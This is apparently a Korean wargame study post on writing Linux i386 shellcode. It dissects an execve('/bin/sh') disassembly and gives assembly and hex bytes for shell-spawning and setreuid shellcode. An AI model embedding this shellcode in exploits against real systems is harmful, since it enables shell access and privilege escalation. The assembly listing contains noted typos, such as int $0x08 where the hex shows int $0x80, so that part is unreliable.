

shellcode 만들기


0x08048328 <main+0>: push   %ebp
0x08048329 <main+1>: mov    %esp,%ebp
0x0804832b <main+3>: sub    $0x8,%esp
0x0804832e <main+6>: and    $0xfffffff0,%esp
0x08048331 <main+9>: mov    $0x0,%eax
0x08048336 <main+14>: sub    %eax,%esp
0x08048338 <main+16>: movl   $0x8048408,0xfffffff8(%ebp)
0x0804833f <main+23>: movl   $0x0,0xfffffffc(%ebp)
0x08048346 <main+30>: sub    $0x4,%esp
0x08048349 <main+33>: push   $0x0
0x0804834b <main+35>: lea    0xfffffff8(%ebp),%eax
0x0804834e <main+38>: push   %eax
0x0804834f <main+39>: pushl  0xfffffff8(%ebp)
0x08048352 <main+42>: call   0x8048258 <execve>
0x08048357 <main+47>: add    $0x10,%esp
0x0804835a <main+50>: leave 
0x0804835b <main+51>: ret





0x08048328 <main+0>: push   %ebp
0x08048329 <main+1>: mov    %esp,%ebp
0x0804832b <main+3>: sub    $0x8,%esp
0x0804832e <main+6>: and    $0xfffffff0,%esp
0x08048331 <main+9>: mov    $0x0,%eax
0x08048336 <main+14>: sub    %eax,%esp
ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ>함수 도입부
                                                                                                       스택 8byte 확장!
0x08048338 <main+16>: movl   $0x8048408,0xfffffff8(%ebp)
0x0804833f <main+23>: movl   $0x0,0xfffffffc(%ebp)
ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ>/bin/sh 문자열의 주소($0x8048408)를 스택에 넣고,
                                                                                                         0을 그 다음스택에 넣는다.
0x08048346 <main+30>: sub    $0x4,%esp
0x08048349 <main+33>: push   $0x0
0x0804834b <main+35>: lea    0xfffffff8(%ebp),%eax
0x0804834e <main+38>: push   %eax
0x0804834f <main+39>: pushl  0xfffffff8(%ebp)
0x08048352 <main+42>: call   0x8048258 <execve>
ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ->execve(str[0], str, 0) 부분
                                                                                                         거꾸로 0, str, str[0] 순으로 들어간다.
                                                                                                        그리고 execve를 호출한다.
0x08048357 <main+47>: add    $0x10,%esp
0x0804835a <main+50>: leave 
0x0804835b <main+51>: ret

이걸 스택으로 그려 보면은 이런 모양이 나옵니다.

높은주소
ret
 ebp
 0(NULL)
$0x8048408(/bin/sh)
 dummy 4
0(NULL)
push eax(str)
push 0xfffffff8(str[0])
ret
ebp

낮은주소



execve함수(쉘을 띄우는 어셈블리)
# execve("/bin/sh", ["/bin/sh", NULL], NULL) in i386 GAS (AT&T) syntax, written so
# that the string address is obtained from a call/pop pair rather than an absolute
# address. The hex string that follows this listing is its byte encoding.
# Register roles at the system call: ebx = path pointer, ecx = argv pointer,
# edx = envp (0), eax = call number. Linux i386 ABI: int $0x80, number in eax.
.globl main

main:
          jmp go                        # jump forward to `go`, which sits just before the string bytes

funs:
          pop %ebx                      # return address pushed by `call funs` == address of "/bin/sh"
          xor %eax, %eax                # eax = 0
          push %eax                     # argv[1] = NULL
          push %ebx                     # argv[0] = pointer to "/bin/sh"
          movl %esp, %ecx               # ecx = &argv[0]; esp now points at the two values just pushed
          xor   %edx, %edx              # edx = 0 -> envp = NULL
          movl $0xb, %al                # eax = 11 (execve) via the low byte; NOTE: `movl` with %al is a
                                        # size mismatch as written, the hex dump encodes a byte move (b0 0b)
          int $0x08                     # NOTE: the hex dump (\xcd\x80) encodes `int $0x80`, the Linux
                                        # system-call gate; vector 0x08 here reads like a transcription typo

go:
           call funs                    # pushes the address of the bytes below as return address, runs funs
           .string "/bin/sh"            # .string appends a terminating 0 byte, which the hex dump below omits
\xeb\x0d\x5b\x31\xc0\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xe8\xee\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68





setreuid어셈블리
# System call 0x46 (70) with both register arguments set to 0x0206, in i386 GAS
# (AT&T) syntax; the heading labels it setreuid. The hex string after this listing
# is its byte encoding. Register roles at int $0x80: eax = 0x46, ebx = ecx = 0x206.
# There is no exit/ret after the call: execution falls through into whatever bytes
# follow this sequence in memory.
.globl main

main:
        xor %eax, %eax                  # eax = 0
        mov $0x06, %al                  # low byte   -> eax = 0x00000006
        mov $0x02, %ah                  # second byte -> eax = 0x00000206 (decimal 518)
        mov %eax, %ebx                  # ebx = 0x206 (first call argument)
        mov %ebx, %ecx                  # ecx = 0x206 (second call argument, same value)
        xor %eax, %eax                  # clear eax before loading the call number
        mov $0x46, %al                  # eax = 0x46 = 70
        int $0x80                       # Linux i386 system-call gate
\x31\xc0\xb0\x06\xb4\x02\x89\xc3\x89\xd9\x31\xc0\xb0\x46\xcd\x80



추가적으로 0x06 부분과 0x02 부분을 바꿔주면서 id값을 바꿀 수 있다. 으엌ㅋㅋㅋㅋㅋㅋ
jlevel0풀면서 많은거 얻어가네요 으엌ㅋㅋㅋㅋㅋ
